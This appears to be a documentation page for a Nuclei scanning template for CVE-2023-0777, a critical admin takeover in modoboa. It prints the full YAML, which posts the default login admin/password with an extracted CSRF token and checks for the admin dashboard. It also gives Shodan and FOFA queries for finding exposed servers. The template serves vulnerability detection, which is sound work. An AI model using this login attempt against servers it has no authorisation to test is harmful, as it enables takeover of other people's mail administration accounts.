modoboa 2.0.4 - Admin TakeOver
ID: CVE-2023-0777
Severity: critical
Author: r3Y3r53
Tags: cve2023,cve,huntr,packetstorm,modoboa,default-login
Description
Section titled “Description”Authentication Bypass by Primary Weakness in GitHub repository modoboa/modoboa prior to 2.0.4.
YAML Source
Section titled “YAML Source”id: CVE-2023-0777
info: name: modoboa 2.0.4 - Admin TakeOver author: r3Y3r53 severity: critical description: | Authentication Bypass by Primary Weakness in GitHub repository modoboa/modoboa prior to 2.0.4. remediation: update to version 2.0.4 reference: - https://huntr.dev/bounties/a17e7a9f-0fee-4130-a522-5a0466fc17c7/ - http://packetstormsecurity.com/files/171744/modoboa-2.0.4-Admin-Takeover.html - https://github.com/modoboa/modoboa/commit/47d17ac6643f870719691073956a26e4be0a4806 - https://github.com/7h3h4ckv157/7h3h4ckv157 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2023-0777 cwe-id: CWE-305,NVD-CWE-Other epss-score: 0.07913 epss-percentile: 0.93646 cpe: cpe:2.3:a:modoboa:modoboa:*:*:*:*:*:*:*:* metadata: verified: true max-request: 3 vendor: modoboa product: modoboa shodan-query: - html:"Modoboa" - http.favicon.hash:1949005079 - http.html:"modoboa" fofa-query: - body="Modoboa" - body="modoboa" - icon_hash=1949005079 tags: cve2023,cve,huntr,packetstorm,modoboa,default-login
http: - raw: - | GET /accounts/login/ HTTP/1.1 Host: {{Hostname}} - | POST /accounts/login/ HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded
csrfmiddlewaretoken={{csrftoken}}&username={{username}}&password={{password}}&next=%2F - | GET /dashboard/ HTTP/1.1 Host: {{Hostname}}
payloads: username: - admin password: - password attack: pitchfork host-redirects: true matchers: - type: dsl dsl: - 'status_code_3 == 200' - 'contains(content_type_3, "text/html")' - 'contains(body_3, "Dashboard") && contains(body_3, "Hello admin")' condition: and
extractors: - type: regex part: header name: csrftoken internal: true group: 1 regex: - csrftoken=([A-Za-z0-9]+)# digest: 490a0046304402204eaed0e49e32f239eb22149db8969552c67e02e9d6f241dc6a8176a1839ff77102201976545e2343f9f8a68f6daf9934cf68ecd0cd79e6bec3c4976ac02b768c93b7:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2023/CVE-2023-0777.yaml"